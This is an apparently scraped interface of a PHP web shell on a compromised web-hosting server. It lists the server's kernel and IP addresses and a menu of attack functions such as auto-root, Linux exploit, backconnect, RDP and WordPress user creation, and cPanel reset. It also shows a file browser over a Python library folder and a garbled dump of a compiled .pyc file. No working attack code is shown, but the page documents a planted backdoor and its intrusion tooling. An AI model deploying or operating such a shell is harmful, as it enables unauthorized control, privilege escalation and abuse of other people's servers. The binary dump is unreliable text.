Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.117.159.105
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
xml /
sax /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
3.24
KB
-rw-r--r--
__init__.cpython-34.pyo
3.24
KB
-rw-r--r--
_exceptions.cpython-34.pyc
5.56
KB
-rw-r--r--
_exceptions.cpython-34.pyo
5.56
KB
-rw-r--r--
expatreader.cpython-34.pyc
13
KB
-rw-r--r--
expatreader.cpython-34.pyo
13
KB
-rw-r--r--
handler.cpython-34.pyc
12.21
KB
-rw-r--r--
handler.cpython-34.pyo
12.21
KB
-rw-r--r--
saxutils.cpython-34.pyc
13.35
KB
-rw-r--r--
saxutils.cpython-34.pyo
13.35
KB
-rw-r--r--
xmlreader.cpython-34.pyc
17.1
KB
-rw-r--r--
xmlreader.cpython-34.pyo
17.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmlreader.cpython-34.pyc
� j fD1 � @ s� d Z d d l m Z d d l m Z m Z Gd d � d � Z Gd d � d e � Z Gd d � d � Z Gd d � d � Z Gd d � d � Z Gd d � d e � Z d d � Z e d k r� e � n d S)z]An XML Reader is the SAX 2 name for an XML parser. XML Parsers should be based on this code. � )�handler)�SAXNotSupportedException�SAXNotRecognizedExceptionc @ s� e Z d Z d Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d S)!� XMLReadera% Interface for reading an XML document using callbacks. XMLReader is the interface that an XML parser's SAX2 driver must implement. This interface allows an application to set and query features and properties in the parser, to register event handlers for document processing, and to initiate a document parse. All SAX interfaces are assumed to be synchronous: the parse methods must not return until parsing is complete, and readers must wait for an event-handler callback to return before reporting the next event.c C s@ t j � | _ t j � | _ t j � | _ t j � | _ d S)N) r ZContentHandler� _cont_handlerZ DTDHandler�_dtd_handlerZEntityResolver�_ent_handlerZErrorHandler�_err_handler)�self� r �6/opt/alt/python34/lib64/python3.4/xml/sax/xmlreader.py�__init__ s zXMLReader.__init__c C s t d � � d S)zAParse an XML document from a system identifier or an InputSource.z This method must be implemented!N)�NotImplementedError)r �sourcer r r �parse s zXMLReader.parsec C s | j S)z#Returns the current ContentHandler.)r )r r r r �getContentHandler"